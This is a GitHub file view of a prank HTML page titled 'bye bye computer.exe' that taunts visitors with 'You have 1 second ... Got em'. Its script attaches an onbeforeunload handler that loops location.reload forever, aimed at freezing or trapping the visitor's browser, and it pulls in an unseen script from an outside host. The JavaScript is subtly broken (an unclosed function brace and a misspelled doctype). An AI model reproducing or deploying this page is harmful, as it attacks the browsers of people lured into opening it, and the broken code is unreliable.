-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtest.html
More file actions
44 lines (40 loc) · 1.57 KB
/
test.html
File metadata and controls
44 lines (40 loc) · 1.57 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<!DOCTTYPE html>
<html lang="en-US"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- Home thing -->
<link rel="stylesheet" href="https://awashcard0.pages.dev/home-thing/style.css">
<script src='https://awashcard0.pages.dev/home-thing/script.js'></script>
<!-- End home thing -->
<link rel="profile" href="http://gmpg.org/xfn/11">
<title>bye bye computer.exe</title>
<meta name="robots" content="noindex, nofollow">
<link rel="dns-prefetch" href="//fonts.googleapis.com">
<link rel="dns-prefetch" href="//s.w.org">
<link href="https://fonts.gstatic.com" crossorigin="" rel="preconnect">
<link rel="stylesheet" id="twentyseventeen-fonts-css" href="https://fonts.googleapis.com/css?family=Libre+Franklin%3A300%2C300i%2C400%2C400i%2C600%2C600i%2C800%2C800i&subset=latin%2Clatin-ext" type="text/css" media="all">
<style type="text/css">
h2{
font-family: "Libre Franklin", "Helvetica Neue", helvetica, arial, sans-serif;
text-align: center;
margin-top: 256px;
font-size: 1.625rem;
font-weight: 300;
color: #666;
padding: 0;
line-height: 1.4;}
</style>
</head>
<!--Code from https://github.com/ER332423/testsite/blob/main/test.html-->
<body><h2>You have 1 second<br><br>How did you fall for that (:<br><br>Got em</h2><body>
<body>
<script>
var delayInMilliseconds = 500 //1 second
setTimeout(function() {
//your code to be executed after 1 second
onbeforeunload = function(){localStorage.x=1
while(1)location.reload(1)
}, delayInMilliseconds);
</script>
</body>
<html>